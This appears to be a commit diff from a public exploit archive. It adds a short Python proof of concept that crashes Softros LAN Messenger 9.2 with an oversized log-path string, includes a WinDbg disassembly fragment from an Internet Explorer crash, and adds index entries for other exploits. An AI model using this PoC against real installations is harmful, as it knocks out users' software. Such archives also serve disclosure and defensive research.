555ae80b 8bc6 mov eax,esi
555ae80d 8b38 mov edi,dword ptr [eax]
555ae80f 85ff test edi,edi
555ae811 7462 je MSHTML!Tree::Notify_InvalidateDisplay+0x7a (555ae875)
555ae813 8bcf mov ecx,edi
555ae815 e8b664d5ff call MSHTML!CElement::GetMarkupPtr (55304cd0)
1:022:x86>
MSHTML!TSmartPointer<CFilterNativeInfo>::operator&+0x12:
555ae7f3 50 push eax
555ae7f4 e8a7f9c6ff call MSHTML!CFilterNativeInfo::Release (5521e1a0)
555ae7f9 ebf4 jmp MSHTML!TSmartPointer<CFilterNativeInfo>::operator&+0xe (555ae7ef)
MSHTML!Tree::Notify_InvalidateDisplay:
555ae7fb 8bff mov edi,edi
555ae7fd 53 push ebx
555ae7fe 56 push esi
555ae7ff 8bf1 mov esi,ecx
555ae801 57 push edi

23
exploits/windows_x86-64/dos/45781.py Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: Softros LAN Messenger 9.2 - Denial of Service (PoC)
# Discovery by: Victor Mondragón
# Discovery Date: 2018-11-02
# Vendor Homepage: https://messenger.softros.com/
# Software Link: https://messenger.softros.com/downloads/
# Tested Version: 9.2
# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1
# Steps to produce the crash:
# 1.- Run python code: Softros_LAN_Messenger_v9.2.py
# 2.- Open msn.txt and copy content to clipboard
# 2.- Open Softros LAN Messenger
# 3.- Select "Logging"
# 4.- Locate "Log Files Location "
# 5.- Select "Custom Location" and Paste ClipBoard
# 6.- Click on "OK"
# 7.- Crashed
cod = "\x41" * 2000
f = open('msn.txt', 'w')
f.write(cod)
f.close()

13
files_exploits.csv
View file

@ -6175,6 +6175,7 @@ id,file,description,date,author,type,platform,port
45769,exploits/windows_x86-64/dos/45769.py,"WinMTR 0.91 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45781,exploits/windows_x86-64/dos/45781.py,"Softros LAN Messenger 9.2 - Denial of Service (PoC)",2018-11-05,"Victor Mondragón",dos,windows_x86-64,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10077,6 +10078,9 @@ id,file,description,date,author,type,platform,port
45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd,
45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows,
45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows,
45778,exploits/windows/local/45778.txt,"Microsoft Internet Explorer 11 - Null Pointer Dereference",2018-11-05,LiquidWorm,local,windows,
45782,exploits/macos/local/45782.c,"LiquidVPN 1.36 / 1.37 - Privilege Escalation",2018-11-05,"Bernd Leitner",local,macos,
45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40281,3 +40285,12 @@ id,file,description,date,author,type,platform,port
45766,exploits/php/webapps/45766.txt,"Gate Pass Management System 2.1 - 'login' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
45767,exploits/php/webapps/45767.txt,"qdPM 9.1 - 'filter_by' SQL Injection",2018-11-02,AkkuS,webapps,php,80
45768,exploits/php/webapps/45768.txt,"Yot CMS 3.3.1 - 'aid' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
45773,exploits/php/webapps/45773.txt,"SiAdmin 1.1 - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80
45774,exploits/asp/webapps/45774.py,"Advantech WebAccess SCADA 8.3.2 - Remote Code Execution",2018-11-05,"Chris Lyne",webapps,asp,
45775,exploits/php/webapps/45775.txt,"WebVet 0.1a - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80
45776,exploits/hardware/webapps/45776.py,"Virgin Media Hub 3.0 Router - Denial of Service (PoC)",2018-11-05,"Ross Inman",webapps,hardware,
45777,exploits/php/webapps/45777.txt,"Poppy Web Interface Generator 0.8 - Arbitrary File Upload",2018-11-05,"Ihsan Sencan",webapps,php,
45779,exploits/php/webapps/45779.txt,"Mongo Web Admin 6.0 - Information Disclosure",2018-11-05,"Ihsan Sencan",webapps,php,
45780,exploits/php/webapps/45780.py,"PHP Proxy 3.0.3 - Local File Inclusion",2018-11-05,AkkuS,webapps,php,
45783,exploits/json/webapps/45783.html,"Royal TS/X - Information Disclosure",2018-11-05,"Jakub Palaczynski",webapps,json,54890
45784,exploits/php/webapps/45784.txt,"Voovi Social Networking Script 1.0 - 'user' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,

Can't render this file because it is too large.